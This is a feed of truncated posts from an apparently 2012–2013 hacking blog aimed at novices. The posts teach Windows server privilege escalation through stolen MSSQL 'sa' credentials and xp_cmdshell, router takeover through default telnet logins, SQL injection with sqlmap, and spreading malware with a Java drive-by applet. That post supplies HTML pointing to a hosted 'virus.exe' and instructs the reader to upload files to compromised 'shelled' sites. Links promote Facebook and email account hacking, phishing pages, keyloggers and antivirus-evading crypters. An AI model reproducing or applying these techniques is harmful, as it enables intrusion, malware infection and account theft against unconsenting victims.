Hacking Loops | Learn How to Hack

How to Hack Windows Servers Using Privilege Escalation

noreply@blogger.com (Lokesh Singh) — Wed, 15 May 2013 07:42:01 PDT

Most of us here can hack websites and servers. But what we hate the most is an error message- Access Denied! We know some methods to bypass certain restrictions using the symlink, privilege-escalation using local root exploits and some similar attacks. But, these get the job done only on Linux servers. What about windows servers? Here are some ways to bypass certain restrictions on windows servers or getting SYSTEM privileges. Using "sa" account to execute commands by MSSQL query via 'xp_cmdshell' stored procedure. Using meterpreter payload to get a reverse shell over the target machine. Using browser_autopwn. (Really...) Using other tools like pwdump7, mimikatz, etc. Using the tools is an easy way, but the real fun of hacking lies in the first three methods I mentioned above. 1. Using xp_cmdshell- Most of the times on windows servers, we have read permission over the files of other IIS users, which is needed to make this method work. If we are lucky enough, we will find login credentials of "sa" account of MSSQL server inside web.config file of any website. You must be wondering why only "sa"? Here, "sa" stands for Super Administrator and as the name tells, this user has all possible permissions over the server. The picture below shows the connection string containing login credentials of "sa" account. Using this, we can log into MSSQL server locally (using our web backdoor) & as well as remotely. I would recommend remote access because it does not generate webserver logs which would fill the log file with our web backdoor path. So, after getting the "sa" account, we can login remotely using HeidiSQL HeidiSQL is an awesome tool to connect to remote database servers. You can download it here. After logging into MSSQL server with sa account, we get a list of databases and their contents. Now we can execute commands using MSSQL queries via xp_cmdshell. (With...

[[ This is a content summary only. Visit my website for full links, other content, and more! ]]

DNSDICT6 Hack Tool Tutorial | Know your Backtrack HackingLoops

noreply@blogger.com (Lokesh Singh) — Sun, 24 Mar 2013 01:16:16 PDT

Hacking is always fun but only when you know to do the things. All websites available on Net teaches only basic stuff or simple novice level stuff. There is one website which provides Elite level tutorials and Concepts. To strengthen our Name, we are starting a sub-level Campaign KYB (Know your Backtrack) under BEHC (Born Ethical hackers Club) campaign. In KYB campaign, we will teach all the Backtrack Hacking Tools to Hackers. This is the First tutorial in this series. Today we will learn DNSDICT6 Hacking Tool. So lets begin our learning.. DNSDICT6 : BASICS DNSDICT6 is a Information Gathering tool provided with Backtrack. This tool is used to find all the sub-domains of a website or web server. The most advanced use of DSNDICT6 is to enumerate all IPv4 and IPv6 addresses and extract the dumps like sub-domains, IP information. This tool is quite a powerful tool because it also extracts those sub domains which are restricted or invisible for users. DNSDICT6 Tutorial Basic Syntax of DNSDICT6 is : For example : dnsdict6 -d4 google.com ( This will extract all sub-domains of google and their IPv4 and IPv6 information. There are certain Parameters that we can use with dnsdict6 : -d is used to display information on Name Servers and MX Records -4 is used to dump IPv4 addresses. There are four types of dictionary which are already inbuilt in this tool. -s(mall=50), -m(edium=796) (DEFAULT) -l(arge=1416), or -x(treme=3211). -t is used to specify no. of threads. Advanced Example of DNSDICT6: dnsdict6 -d46 -x -s -t 10 google.com ( This will extract all the sub-domains of Google with their IPv4 and IPv6 information). Now lets learn How to use DNSDICT6. DNSDICT6 (Know your Backtrack [KYB]) Tutorial : 1. First of all start your Backtrack Linux. Now to start DNSDICT6 we have multiple ways. a. Go by GUI Menu Based options : Applications --> BackTrack --> Information Gathering --> Network Analysis...

[[ This is a content summary only. Visit my website for full links, other content, and more! ]]

How Hackers Spread Java Drive by Malware online

noreply@blogger.com (Lokesh Singh) — Sat, 23 Mar 2013 22:50:38 PDT

We are back with a new tutorial. Well making a malicious virus is one thing but how to spread it? Or how hackers hunt for victims? Well you will definitely be disappointed when you’ll know that this trick fails sometimes! Victims are now mostly aware of the old social engineering stuff. But cheers up my friend there's no end, i will show you a very effective methods that Hackers use to spread malicious viruses/worms. But first of all we should know what is Java Drive by Malware? What is Java drive by? A Java Drive-By is a Java Applet that is coded in Java, when placed on a website. Once you click "Run" on the pop-up, it will download a program off the internet. This program can be used to spread a virus and malware effectively and has been spotted in the wild. We can execute .exe files in victims’ computer without their permission with the help of java drive by. You can see the image of error below this: Jave Drive By Okay so whats the scenario behind this? well this is a java script in the source which pop ups the error, So lets learn how to do the job. Tools Needed : i) a .jar file which is the main player of this game. Download it from here http://www.mediafire.com/?mmafl2carb1s159 ii) A shelled web where you will upload files for JAVA DRIVE BY! Plus you should know basic HTML to make a attractive web page. iii) A java script which is the backbone of your game. Now lets get started, Upload you .jar file on the shelled web, than create a fake webpage its up to you how you much you make fake webpage attractive, but you have to add the java code due to which the pop up error will appear. Java Code : <APPLET CODE = "Client.class" ARCHIVE = "Client.jar" WIDTH = "0" HEIGHT = "0"> <PARAM NAME = "AMLMAFOIEA" VALUE = "http://www.yoursite.com/virus.exe"> So add the above code in your face webpage, just make some changes replace VALUE =...

[[ This is a content summary only. Visit my website for full links, other content, and more! ]]

How to Install Backtrack on Virtual Box Tutorial

noreply@blogger.com (Lokesh Singh) — Fri, 22 Mar 2013 19:21:47 PDT

Backtrack is backbone of hackers. If you don't use it then stop calling yourself as Hacker. In our BEHC campaign, i have told you that we will be using Backtrack as our secondary OS i.e. virtual machine for performing advance hacking techniques. Most of people faced problem in installing Backtrack 5 r3. Today, i will guide you how to install Backtrack Operating system on Virtual Box or any other Virtual machine. Let's start... Basic things before beginning installation: 1. Virtual Box 2. Backtrack Linux OS ISO image or DVD Now lets learn stepwise, how to install Backtrack Linux on Virtual Box: 1. First of all open the Virtual Box by clicking on Virtual box icon ( will come after installing virtual box). 2. Now for first time we need to create Virtual Machine (Virtual Operating system on which we will install Backtrack). To do so Click on New button then a pop up will open. In Name fill anyname that you wish to give to your virtual Machine say Hackingloops. Select Type as Linux and Version as Other Linux. Sample is shown below: Create new VM On Clicking Next Select the Ram according, for best optimized performance try to allocate more i.e. anything between 1 GB to 3 GB. Say i allocated 3 GB(Maximum for 32 Bit). Select Ram for VM Then click on Next Button as highlighted. Now Proceed as shown in snapshots. Select Create Virtual Drive As shown above click on Create : Select VDI Select VDI (Virtual Disk Image) and Click on Next. select dynamically allocated option Now select Dynamically Allocated as shown above. Assign Hard Drive Size for VM Now assign the Virtual Hard Disk size as shown above, 20GB will be Good for optimization. Now When you click on Create Virtual Machine will be created as shown Below. Configure Internet Settings on VM To enable internet over the Virtual Machine, we need to configure the Network as shown below : Configure Internet...

[[ This is a content summary only. Visit my website for full links, other content, and more! ]]

Learn Ethical Hacking BEH | Footprinting Book 3 Online

noreply@blogger.com (Lokesh Singh) — Wed, 20 Feb 2013 21:12:40 PST

Learn ethical Hacking with HackingLoops Campaign BEH (Born Ethical Hackers) third book is online now. In our last issue we have started learning about preparatory phase of any hacking attempt i.e. Information gathering or Footprinting. Let’s have a brief overview what we have covered in our last BEHC issue. We have started with the introduction part of Footprinting or information gathering and then we have covered several Footprinting and information gathering techniques namely how to get an IP address of victim, different techniques to steal IP address, Ping sweep, Flood Ping DDOS attack, Trace route, WHOIS information gathering, extracting history details of any domain, owner contact information extraction, DNS queries and DNS health check to discover domain level bugs. This was all what we covered in our last issue. In this issue we will continue learning about other information gathering techniques. Born Ethical Hackers Club : Book 3 The techniques that we learn in this issue are mentioned below: Overview of Last BEH Issue: Footprinting or information Gathering Techniques Search Engine discovery Dorks Spiders, Crawlers or Robots discovery Web Data Extraction or Web Scraping Fetching the Data Dealing with Pagination. AJAX CONTENT EXTRACTION! Use CSS Hooks Get a Good HTML Parsing Library. When In Doubt, Spoof Headers Content behind a Login. Rate Limiting Poorly Formed Markup. Reviewing Metadata and JavaScript’s Parser and Markup information. Using Page Speed to Dig Critical Information about website Automated Data Extraction using Hack tools Exiftool FOCA Web Application OR WEB SERVER Fingerprint Manual Fingerprinting Automated Fingerprinting People Search: Prepare Social Engineering Attack Profile DOWNLOAD BEH ETHICAL HACKING FOOTPRINTING BOOK 3 (Direct Download) Alternate Download Link We hope you all will enjoy the book. If there are...

[[ This is a content summary only. Visit my website for full links, other content, and more! ]]

Source Code of Havij SQL Injection Hack Tool by Hackingloops

noreply@blogger.com (Lokesh Singh) — Fri, 08 Feb 2013 06:51:54 PST

Welcome friends, Today i am sharing Source code of World's best SQL Injection Hack tool available in the market, off course its Havij. Its success rate is more than 95% (if website is vulnerable to SQL injection). Havij is one of the best SQL injection tool which is used to hack websites. It is developed by ITsec team. Hackingloops has reverse engineered (or decoded) the complete(/full) source code of Havij SQL Injection Hack tool. Here is the brief about Havij, Havij is available in two versions first normal(free version) and second is professional(paid version). We have reverse engineered the pro version of Havij tool. Havij tool is coded in Visual basic. It uses the class VB6 form based structure. Havij Source using VB6 Brief about Havij? Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page. It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing the underlying file system and executing commands on the operating system. How i reverse engineered it? Few days back i was looking at bit stream of Havij as it got detected by Antivirus, so i was searching of digital signature which is getting detected. In the meanwhile i thought lets have a look at its binary i.e. exe so what i did i used PEID to explore what is used to build the Havij tool. And you all will laugh to listen that it was bad luck of Havij that it showed me unknown packer is used to build. So i have tried few of y favorite PE explorers and here is the result, i came to know that Havij is coded with the help of VB6. Now the only thing remain after that is finding the Entry point and yesterday i have found it and here is the source code :P. I extracted the decoded...

[[ This is a content summary only. Visit my website for full links, other content, and more! ]]

Website Hacking | Learn how to hack websites

noreply@blogger.com (Lokesh Singh) — Fri, 25 Jan 2013 19:56:20 PST

Hacking website means altering or manipulating the website content or database i.e. manipulate website contents say CSS or Javascipts, leak its users database, corrupt its database, deface the website's index page, exploit the anonymous login and much more... Hacking websites is nowadays became a fashion among the Hackers. They hack the website and deface its index page to display their own custom defaced page, mostly for popularity. There are several website Hacking techniques like Injection attacks i.e. SQL Injection, Command Injection, Local File Inclusion injection, XPath Injection, arc injection, Cross site scripting attacks, Cross site scripting forgery attacks, Header manipulation, hacking root directories, bypassing registration, unblocking websites, Hacking premium accounts, Cookie based attacks, domain hijacking and much more involved in achieving above mentioned goals. Hackingloops listed all the Website Hacking articles posted on Hackingloops till date. So learn how to Hack websites or Website Hacking. List of website Hacking Articles: 10 step guide to prevent SQL injection Hacking websites SQL injection tutorial 6 Ways to Hack or deface Websites Online Advanced Persistant Threat Analysis with Network traffic Analysis Hack websites using Command Injection Hacking Websites using SQLMAP | HackingLoops Tutorials Hacking websites using Directory Traversal Attacks | Hackingloops How to Hack Facebook account or password How to access blocked sites or country restricted sites How to bypass registration on forums to view content How to hack Filesonic Premium Account Video Tutorial How to hack facebook account password Hackingloops How to make a Phisher or Fake Pages IMCE Dir Exploit for Hacking Drupal Websites Unblock torrent websites in India on Airtel | MTNL XPath Injection Tutorial to Hack Websites Database How to Deface Websites using SQL and Php scripting? How to hack a Website or websites database How to hack websites by Remote File...

[[ This is a content summary only. Visit my website for full links, other content, and more! ]]

Learn Email Hacking | Hack Emails | Protect Email Account

noreply@blogger.com (Lokesh Singh) — Fri, 25 Jan 2013 20:40:52 PST

Email Hacking is what every hacker want to learn at very start of his learning phase. Most people are motivated to Hacking field because of two reasons first they want to take revenge or surprise friends or play pranks with them and second they fall victim to some Hacker i.e. their email account or Facebook account is hacked and misused. Hackingloops has integrated all of its Email Hacking articles at one place. Now now need to search Email Hacking stuff online when you can find everything at one place. We have covered all the fields related to Email Hacking like all techniques that can be used to hack email accounts, how to create fake pages or phish pages, how to secure your email account, how to trace emails, how to hack protect email account, how to detect unusual activity in your email account, how to recover your hacked email accounts, how to send fake emails, email spoofing, tips to improve email privacy, using keyloggers to hack email accounts and much more.. Link to all articles posted by Hackingloops recently on Email Hacking and Hack protect Email accounts : Advanced Tabnabbing Tutorial HackingLoops Gmail Hacker | Fake Tool to Hack Gmail Accounts Gmail SMS Verfication loophole exposed by HackingLoops How to Find Gmail account creation date How to delete spam messages automatically How to detect unusual activity in Gmail account How to protect email account getting hacked How to trace Email Address or fake emails Best keylogger software to hack email accounts or passwords Find Unauthorized Activity in Your Email Account Hack email accounts or passwords using session cookies Hacking Gmail using the GX cookie Loophole and Its Solution How To Trace an Email Address And Original Sender? How to Bypass Antivirus and send Keylogger to Hack Emails and Remote PC using FUD Crypter How to Hack Email Account How to Hack Gmail Account password online How to Hack Gmail Password or Account How to Prevent Email Password from Hackers How to Protect an Email Account...

[[ This is a content summary only. Visit my website for full links, other content, and more! ]]

Facebook Hacking Techniques | HackingLoops

noreply@blogger.com (Lokesh Singh) — Mon, 21 Jan 2013 04:40:49 PST

Hacking Facebook account or password or doing some strange stuffs like text encoding or decoration is one of the most hottest topic on web nowadays. A survey done by Security Experts last year revealed that out of every 3 Facebook users, 1 of them is searching Google for terms like how to hack Facebook accounts or passwords, how to hack friends Facebook account, how to hack girlfriends Facebook ID, how to write decorative and stylish things on Facebook wall and much more. So to easy your effort in searching things on Google, i made this post which consists of all hacking articles that has been shared by Hackingloops regarding Facebook Hacking last few years. Have fun with Facebook Hacking Articles. 4 ways to Hack Facebook account password Advanced Tabnabbing Tutorial HackingLoops Facebook strike text Generator Tool Facebook Flipping Text Generation Tool Facebook Hackify Text Generation Tool Facebook Coolify text Generation Tool Facebook Reverse flip up text tool Facebook Freezer Error 438 Truth Facebook Hack to Display your Custom Message | Hacking Facebook Facebook Text Tools by HackingLoops Facebook account Password hacking techniques Hack Facebook Account password using Tabnabbing Hack Facebook Password using Keylogger Hack Facebook password or accounts remotely Hacking Facebook Chat box Video Tutorial Hacking Facebook account password video Hidden Facebook Smileys Emotions codes How Facebook Clickjacking Spam works How To Delete Someone Else Facebook Account How to Hack Facebook account or password How to Hack Protect Facebook Account How to hack facebook account password Hackingloops How to hack facebook accounts or passwords Java Based Remote Keylogger : Best Facebook Hacker 2 New Facebook Text Tools | Hackify | Coolify 20 Facebook Hacks and Tips You Might Not Know Join CME Hackers Club on Facebook

[[ This is a content summary only. Visit my website for full links, other content, and more! ]]

BEHC Hacking Class 2nd book Online : Footprinting or Information Gathering

noreply@blogger.com (Lokesh Singh) — Mon, 21 Jan 2013 03:15:01 PST

BEHC (Born Ethical Hackers Club) has came up with second issue of its Ethical Hacking Class and Network security campaign. In our last issue we have learnt about basics of terms related to Ethical Hacking or simply Hacking and about how a hacker prepares or launches a hacking attempt or simply say hack attack. We have also discussed brief about different phases that involves in launching a hacking attempt like information gathering, scanning, gaining access, maintaining access and covering tracks respectively. This is what we have discussed in our last issue.The topic of this issue is Footprinting or Information Gathering. This issue will teach you guys how to gather information about any victim or website. The information gathered can be used for launching Social Engineering attack, DDOS attack, Domain Hijacking attack, Domain Poisoning attack or even we can use this information to prepare word file which can be used for brute force attack. BEHC Hacking Class 2nd Issue : Footprinting Part 1 online Normal 0 false false false EN-US X-NONE X-NONE /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-priority:99; mso-style-qformat:yes; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin-top:0in; mso-para-margin-right:0in; mso-para-margin-bottom:10.0pt; ...

[[ This is a content summary only. Visit my website for full links, other content, and more! ]]

5 Ways to Ensure Security of Networks

noreply@blogger.com (Lokesh Singh) — Fri, 11 Jan 2013 08:18:15 PST

Twenty-four hours a day, seven days a week, 365 days each year – it’s happening. Whether you are awake or asleep, in a meeting or on vacation, they are out there probing your network, looking for a way in. A way to exploit you; a way to steal your data, a place to store illegal content, a website they can deface, or any of a hundred other ways to mess with you for the simple joy of it all. And they can do this with relative ease, even in an automated fashion, with simple tools that are readily available to all. 5 Ways to ensure security of Networks I’m talking about network scanners. The bad guys use them all day every day to assess networks around the world because a network scanner is one of the easiest and most efficient ways to find the cracks in your armor. If you want to see your network the same way an attacker would, then you want to use a network scanner. Network scanners perform automated tests of systems over the network. They don’t require agents or any other software to be installed on the “target” machines. They assess a system based on what they can get from it over the network. It’s the same sort of reconnaissance that is performed against your network around the clock, and that is why you want to do it too. Here are five checks you should perform regularly using your network scanner. 1. Vulnerability assessments Network scanners can use databases of known vulnerabilities to check for anything that might present a risk to your systems. Update that database regularly since new vulnerabilities are discovered all the time. 2. Port scans A port scanner is a very fast way to determine what sort of systems are running on your network, and are probably the most common sort of recon you will see. Determine what should be accessible on your network from the Internet, validate that with a port scanner, and then use a combination of firewall rule cleanup and system hardening to shut down anything that doesn’t belong. 3. Default...

[[ This is a content summary only. Visit my website for full links, other content, and more! ]]

Age of Empire Conquerors 1.0c Hack Destructive v8 Game Ranger

noreply@blogger.com (Lokesh Singh) — Tue, 08 Jan 2013 08:15:45 PST

Hey friends, I am back with new version of Destructive Mind v8.0 AOE 1.0c conquerors Multiplayer hack which successfully works on Game Ranger, i have fixed server down, try later bug in the previous version and now it will work perfectly and now no more annoying messages , also it consists of all the previous combo packs of Age of Empires including combo pack 1, combo pack 2, combo pack 3, Destructive v1 to v7 features(fixed) and few newly undetectable cheats for Roll the dice Map, RPG maps, blood maps. I have improved lots of cheats in this Age of empire hacks and make it further undetectable during the game. It works 100% on Game ranger . This trainer is awesome...just enjoy game hacks and have an extra edge over experts. Age of Empires Conquerors Hack v8.0 by De$trUcTiVe M!nD What's new in this version? 1. "Server down, try later" bug fixed. 2. Roll the Dice Kills bonus like 1Rollkill, 5Rollkills,10Rollkills,20Rollkills. 3. Roll the Dice Food bonus like 10RollFood, 20RollFood,50RollFood. 4. Roll the Dice Cart bonus like 1Rollcart, 2Rollcarts, 3Rollcarts, 5Rollcarts. 5. RPG map cheats like 10RPGkills,20RPGkills,50RPGkills. 6. Blood Maps Upgrades like 10Bloodkills, 1Bloodraze bonus. 7. Hanging of Application and crashing of Game is fixed. 8. Warning and Error messages has been fixed. 9. Combo pack 1-3 and Destructive v1-7 bugs are fixed. Note: You need to close the hack after each match and then restart again for new game. Else it will be automatically activated for the player which was your color in previous game. Download AOE Multiplayer Hack Destructive Mind v8.0 Game Ranger How to use the Hack on AGE OF EMPIRES II Conquerors in Game Ranger: 1. Start the Game ranger. Now Join any AOE II conquerors room. 2. While you are in room Go to the hack folder and start the Hack (Destructive Mind v8.0) by double clicking on it. 3. Now when the Game starts (means when you in Game and selecting civilizations teams etc). Go back...

[[ This is a content summary only. Visit my website for full links, other content, and more! ]]

BEHC Ethical Hacking Class First Book Online : Introduction to Ethical Hacking

noreply@blogger.com (Lokesh Singh) — Mon, 07 Jan 2013 07:24:51 PST

BEHC Ethical Hacking class chapter one, Introduction to Ethical Hacking Book is online for readers. Below is the download link of the book. I would like to give the brief about the book. Born Ethical Hacking Club As a campaign that i introduced last month of teaching Ethical Hacking online by introducing a new group called BEHC i.e. Born Ethical Hackers club. Hackingloops proudly represents its very first book on Ethical Hacking. We have decided to publish the complete Ethical Hacking Course in form of weekly books. These books will contains all the necessary text, description that you need to learn hacking. Practical techniques will be supported by their respective video tutorials. All the doubts can be posted on Hacking class posts and i will cover them in my next articles or you all can directly email me @ shiviskingg@gmail.com or post at my wall +Lokesh Singh . This is the very first handbook of BEHC campaign and below is the list of topics being covered. List of Topics covered in BEHC Ethical Hacking Class First Book : Introduction to Ethical Hacking 1. Introduction to BEHC 2. Hack , what is it? 3. Hacking and its introduction 4. Can hacking be Ethical? 5. Difference between Hackers and Crackers 6. Security and its three pillars ( confidentiality, integrity and availability ) 7. How a Hacking attempt is launched 8. Different Phases of Hacking Attempt 9. Phases in Description DOWNLOAD BEHC HACKING BOOK NOW Alternate Download Link: Download I hope you all will enjoy the book. Please report all the bugs or errors though above mentioned media and you can also suggest improvements. All improvement suggestions will be heartily welcomed. DOWNLOAD BEHC HACKING BOOK NOW If you have any issues or concerns or doubts ask me in form of comments. A gesture of thanks is greatly appreciated. Alternate Download Link: Download Regards, Lokesh Singh

[[ This is a content summary only. Visit my website for full links, other content, and more! ]]

BEH Online Ethical Hacking Class : Configure Machine for Hacking

noreply@blogger.com (Lokesh Singh) — Sun, 25 Nov 2012 18:45:48 PST

Hey friends, welcome to HackingLoops. Before starting BEH(Born Ethical Hackers) classes we must configure our system or machine for performing hacking tasks. Because performing hacking can cause damage your systems too and also its one of the major step for beginners to know which all tools we need to install on our system to learn Hacking. Below i have provided quick Hacking setup list which will help you to perform Ethical Hacking Lab tasks with ease. So go through them and install below items. Tools for Born Ethical Hackers Lab List of Tools need to be pre installed for setting up your system to perform BEH Lab tasks : 1. VMware ( for installing and mounting virtual operating systems). 2. Backtrack or Matruix OS Linux Live Disk or Operating system which need to be mounted on VMware. 3. Installing servers : a. IIS for windows based servers. b. Apache Tomcat. c. MySQL workbench. d. Wamp for running PHP codes. 4. Microsoft Visual Studio ( full package with XML spy) 5. IDA pro 6. Swf Flash Decompiler 7. Olydbg 8. VB Decompiler 9. Filezilla FTP client 10. Resource Hacker 11. NMAP 12. Wireshark 13. Mozilla Firefox with Firebug or Google Chrome or IE8 + The above is the mandatory list that you must have before performing Hacking stuff. The other tools we will discuss on regular basis with our hacking classes. I hope you all will be able to install these tools on your machine. You might face problem in doing so, i am ready to help you out. If you have any issues while installing these or any problem in configuring those, feel free to ask. Now its only 4 days for BEH class to start.

[[ This is a content summary only. Visit my website for full links, other content, and more! ]]

Understand how Linux Password works | etc/Passwd File Format

noreply@blogger.com (Lokesh Singh) — Sun, 18 Nov 2012 19:14:02 PST

Hey Friends, Hackingloops is back with another cool fundamental tutorial. Today we will learn How Linux Password works and will understand etc/Passwd file format in detail. Ahha... Forgot most of you are unaware what i am talking about. So let me explain first what is etc/Passwd is? Where it is used? In Linux/Unix operating system etc/Passwd is place where all passwords are stored in encrypted format. To be more clear, /etc/passwd file stores essential information, which is required during login i.e. user account information. /etc/passwd is a text file, that contains a list of the system's accounts, giving for each account some useful information like user ID, group ID, home directory, shell, etc. It should have general read permission as many utilities, like ls use it to map user IDs to user names, but write access only for the superuser (root). Understanding fields in /etc/passwd The /etc/passwd contains one entry per line for each user (or user account) of the system. All fields are separated by a colon (:) symbol. Total seven fields as follows. Generally, passwd file entry looks as follows (click to enlarge image): /etc/passwd file format Username: It is used when user logs in. It should be between 1 and 32 characters in length. Password: An x character indicates that encrypted password is stored in /etc/shadow file. User ID (UID): Each user must be assigned a user ID (UID). UID 0 (zero) is reserved for root and UIDs 1-99 are reserved for other predefined accounts. Further UID 100-999 are reserved by system for administrative and system accounts/groups. Group ID (GID): The primary group ID (stored in /etc/group file) User ID Info: The comment field. It allow you to add extra information about the users such as user's full name, phone number etc. This field use by finger command. Home directory: The absolute path to the directory the user will be in when they log in. If this directory does not exists then users...

[[ This is a content summary only. Visit my website for full links, other content, and more! ]]

3 Necessary things to become Expert Hacker

noreply@blogger.com (Lokesh Singh) — Thu, 08 Nov 2012 23:23:05 PST

Hey friends, being on road of Born Hackers club, i wish to share few of my thoughts that are necessary to become Expert Hacker. Hacking is always a fun, its something like playing pranks using your brain. Most of us always think that Hacking is just related to cracking someone's email or Facebook and then embarrassing the victim by doing childish pranks with his email or Facebook accounts. But if i share the truth, its absolutely not at all what we call word Hacking. I am not here redefining that word Hacking but its necessary for newbies/ignorants to know what actually is Hacking? 3 Things to Become Expert Hacker And before telling newbies/ignorants what Hacking actually is? I want to share what comes in category of newbies/ignorants. Below are some points which explains lot about newbies/ignorants : 1. Media/News : They always manipulate the word Hacking and always portray it as bad thing. Just for making their news spicy they portray the complete Hackers community as Criminals. 2. Parents/Elders(specially relatives who loves to gives advices) : I keep them in ignorants list because they never had hands on Hacking and what they listen from Media/News, they impose on their children and force their children to quit Hacking. 3. New Comers/ Newbies in Hacking : Most peoples are attracted toward hacking for one the following reasons. First to play pranks with their friends by hacking their emails or Facebook accounts. Second, the persons who want to take revenge and few times wanna hack girlfriends account. Now what actually is Hacking? Ahh.. you might have read that in several books or online. Actually it varies from portal to portal, book to book etc. According to me : Hacking is art of exploring the hidden things that are being hidden from general usage and finding loop holes in the security and use them to benefit the others. Few days back i was going through some article on Times of India, and i was really shocked by seeing their...

[[ This is a content summary only. Visit my website for full links, other content, and more! ]]

Want to become Hacker, I will make you expert

noreply@blogger.com (Lokesh Singh) — Tue, 30 Oct 2012 15:40:39 PDT

You want to become Hacker! I will make you the one. Not actually the one, Expert one and its all free. Because teaching should be free as said in holy books. I can give you 100% assurance that if you are willing to become hacker, i will make you the best one. I will teach you whatever i know, whatever i don't know ( i will learn and then i will share with you). Because none can be perfect but experts always exist. Most people have aspirations to become a hacker but they don't know from where to start and what is good and what is bad. Being Hacker as per media is bad but when you go inside you will know the truth. I will help you to explore the same. We are born hackers and started hacking ever since birth but never able to realized the hackers inside ourselves. But you will now, because i will act as catalyst. Note: Catalyst, everything is in you, i will just guide you. Disclaimer : Its up to individual which path he chooses, my motto is to provide knowledge and ethics and i will not leave a single stone unturned. Learn Hacking Campaign Many users daily ask me the one same question again and again. Sir, I want to become an hacker, please teach me. Its really embarrassing at first but then i realized about the positiveness and peoples willingness to learn about cyber security and ethical hacking and most of you will not believe i decided that i will start my campaign again as i don't wanna hurt feeling of learners. Its being a great time when i first started the campaign under the name ISOFTDL cybercops and then under Hackingloops under CHECKMATE program. Because of personal reasons and hectic schedule, i need to turn down the programs but now i have time for my friends, users and learners. I am starting my Campaign again under Hackingloops under program name "Born Hackers Club" (BHC). Born Hackers Club : Hackingloops is starting Born Hackers Club group to teach people Hacking and Cyber security. This time i will be starting from very basics and...

[[ This is a content summary only. Visit my website for full links, other content, and more! ]]

Hacking BSNL Broadband Routers Tutorial by Hackingloops

noreply@blogger.com (Lokesh Singh) — Sun, 28 Oct 2012 01:35:26 PDT

Hey friends, yesterday we learnt about Hacking websites using SQLMAP and Advanced Persistant threat. Today we are going to learn how to break into BSNL ADSL routers. Hacking BSNL broadband routers is quite interesting, so Hackingloops has came up with tutorial on Hacking BSNL broadband routers Tutorial on how to hack BSNL broadband routers. Hacking BSNL Routers Note : This hack works on most of newly ADSL, ADSL2+, ADSL2+M routers. In this article we are going to hack into router to learn more about it. You might not know that this small and innocent looking modem is actually a "Linux CPU". Lets get into it. First do a nmap scan of this modem. Here is a quick example : $ nmap 192.168.1.1 Starting Nmap 5.21 ( http://nmap.org ) at 2012-08-31 19:52 IST Nmap scan report for 192.168.1.1 Host is up (0.052s latency). Not shown: 997 closed ports PORT STATE SERVICE 23/tcp open telnet 80/tcp open http 5431/tcp open park-agent Nmap done: 1 IP address (1 host up) scanned in 0.75 seconds The http port is open and that is why we are able to access the administration page from http://192.168.1.1/ But apart from http the telnet port is also open. So why not try connecting to it. $ telnet 192.168.1.1 Trying 192.168.1.1... Connected to 192.168.1.1. Escape character is '^]'. SemIndia Systems ADSL Router Login: admin Password: > Wow! we are able to login into the telnet daemon of our router using the default username/password of admin/admin. What next... type in the help command and hit enter. It will list the supported commands somewhat like this > help ? help logout reboot adsl atm brctl cat df dumpcfg echo ifconfig kill arp defaultgateway dhcpserver dns lan passwd ppp remoteaccess restoredefault route save swversion wan serialnum lan6 dhcp6c dns6 defaultgateway6 route6 ping ps pwd sntp sysinfo tftp > Some of these are the common terminal commands on linux. ps, pwd, ping, cat etc. So lets see the current working...

[[ This is a content summary only. Visit my website for full links, other content, and more! ]]

Advanced Persistant Threat Analysis with Network traffic Analysis

noreply@blogger.com (Lokesh Singh) — Sun, 28 Oct 2012 01:04:09 PDT

A high degree of stealthiness over a prolonged duration of operation in order to do a successful cyber attack can be defined as Advanced Persistent Threat. The attack objectives therefore typically extend beyond immediate financial gain, and compromised systems continue to be of service even after key systems have been breached and initial goals reached. Today’s successful targeted attacks use a combination of social engineering, malware, and backdoor activities. Nart Villeneuve and James Bennett (Senior Threat Researcher) from Trend Mirco provide an ultimate guide for Detecting (APT) Advanced Persistent Threat activities with Network Traffic Analysis, that can be used to identify malware command-and control (C&C) communications related to these attacks, illustrating how even the most high-profile and successful attacks of the past few years could have been discovered. Advanced Traffic Analysis Paper cover Detecting Remote Access Trojans like The GhostNet, Nitro attack, RSA Breach, Taidoor campaign, Sykipot campaign and more. Nart also talk about the Challenges during Network-Based Detection i.e Two key factors pose challenges to network-based detection encryption and the cloud. More than 90% of intrusions aren't even discovered by the victims themselves, but through third-party notification. In many cases, the APT has been on the victim network for months or even years, exfiltrating intellectual property data plus economic and political information. "The ability to detect APT activity at the network level is heavily dependent on leveraging threat intelligence. A variety of very successful ongoing campaigns can be detected at the network level because their communications remain consistent over time." To get rid of such attacks you much know that what that information is, where it resides, who has access to it, why they have access and when they access it. Answering these types of questions should give you a clearer...

[[ This is a content summary only. Visit my website for full links, other content, and more! ]]

Hacking Websites using SQLMAP | HackingLoops Tutorials

noreply@blogger.com (Lokesh Singh) — Sun, 28 Oct 2012 00:51:03 PDT

Hey friends, Hackingloops is back with another tutorial on Hacking Websites. Today we will learn how to hack websites using SQLMAP. Hacking websites using SQLMAP is quite easy, if you know how to use SQLMAP. Sqlmap is one of the most popular and powerful sql injection automation tool out there. Get it from http://sqlmap.org/. In this tutorial we are going to learn how to use sqlmap to exploit a vulnerable web application and see what all can be done with such a tool. For the list of options and parameters that can be used with the sqlmap command, check the following url https://github.com/sqlmapproject/sqlmap/wiki/Usage To understand this tutorial you should have a thorough understanding of how database driven web applications work. For example those made with php+mysql. Urls Lets say you have a url like this http://www.site.com/section.php?id=51 and that it is prone to sql injection because the developer of that site did not properly escape the parameter id. This can be simply tested by trying to open the url http://www.site.com/section.php?id=51' We just added a single quote in the parameter. If this url throws an error then it is clear that the database has reacted with an error because it got an unexpected single quote. Hacking with sqlmap Now its time to move on to sqlmap to hack such urls. The sqlmap command is run from the terminal with the python interpreter. python sqlmap.py -u "http://www.site.com/section.php?id=51" The above is the first and most simple command to run with the sqlmap tool. It will check the url and try to discover basic information about the system. The output can look something like this [*] starting at 12:10:33 [12:10:33] [INFO] resuming back-end DBMS 'mysql' [12:10:34] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: id Type: error-based Title: MySQL >= 5.0 AND...

[[ This is a content summary only. Visit my website for full links, other content, and more! ]]

